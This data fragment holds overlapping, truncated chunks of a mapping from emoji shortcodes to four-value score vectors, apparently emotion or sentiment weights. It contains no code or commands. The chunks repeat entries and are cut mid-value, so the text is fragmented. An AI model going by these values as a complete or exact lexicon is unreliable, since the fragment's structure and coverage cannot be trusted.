0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998],", "0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205,", "\":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215,", "[0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37,", "[0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001,", "\":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174,", "\":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999,", "\":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389,", "\":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247,", "0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001],", "0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27,", "0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], 
\":ring:\": [0.171,", "\":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375,", "[0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271,", "\":cactus:\": [0.087, 0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131,", "0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\":", "0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196,", "[0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155,", "\":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17,", "0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214,", "0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244,", "0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282],", "0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\":", "\":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002,", 
"0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226],", "\":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998,", "0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305,", "\":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284,", "0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\":", "0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3,", "0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998],", "0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\":", "0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111],", "0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134],", "0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\":", "[0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017,", "\":bear_face:\": 
[0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08,", "[0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001,", "[0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125,", "0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21,", "0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282,", "0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996,", "0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175],", "[0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105,", "0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282],", "0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27],", "0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149,", "[0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 
0.18899999999999997,", "[0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302,", "[0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222,", "[0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005,", "\":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16,", "0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\":", "0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\":", "0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166],", "0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162],", "\":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196,", "0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\":", "[0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282,", "0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25],", "0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": 
[0.22399999999999998,", "0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327],", "0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307],", "0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275],", "[0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09,", "0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\":", "[0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147,", "[0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345,", "[0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068,", "\":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192,", "\":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172,", "\":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179,", "0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\":", "\":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 
0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096,", "[0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03,", "\":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126,", "0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08],", "0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\":", "0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257,", "\":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239,", "0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051,", "0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\":", "\":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081,", "0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205],", "0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261],", "0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 
0.228],", "0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19,", "0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098,", "0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25],", "0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406],", "0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19],", "0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111],", "0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\":", "\":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313,", "0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2],", "\":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247,", "0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\":", "[0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15,", "0.214, 0.16699999999999998, 0.22], \":bug:\": 
[0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138],", "0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075,", "0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\":", "0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156,", "0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102],", "0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162],", "[0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179,", "[0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31,", "0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\":", "0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196],", "0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997],", "0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065,", "0.17], \":diamond_suit:\": [0.305, 
0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001,", "0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086],", "0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998,", "\":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165,", "\":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998,", "0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\":", "0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999],", "0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\":", "\":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265,", "0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282],", "\":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002,", "[0.085, 0.16899999999999998, 0.067, 0.23], 
\":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382,", "0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242],", "0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327],", "\":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162,", "0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361,", "0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001,", "0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\":", "0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\":", "\":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138,", "\":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198,", "0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\":", "\":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262,", "\":kiss:\": 
[0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252,", "0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284],", "[0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998,", "[0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233,", "\":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126,", "[0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23,", "[0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391,", "0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\":", "0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185],", "0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001,", "\":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34,", "0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 
0.14300000000000002], \":books:\":", "0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\":", "0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\":", "0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\":", "0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\":", "0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299],", "\":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28,", "\":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998,", "0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18,", "0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242,", "0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228],", "\":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299,", "[0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], 
\":panda_face:\": [0.069, 0.23199999999999998, 0.091,", "0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\":", "[0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125,", "\":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132,", "0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205,", "[0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 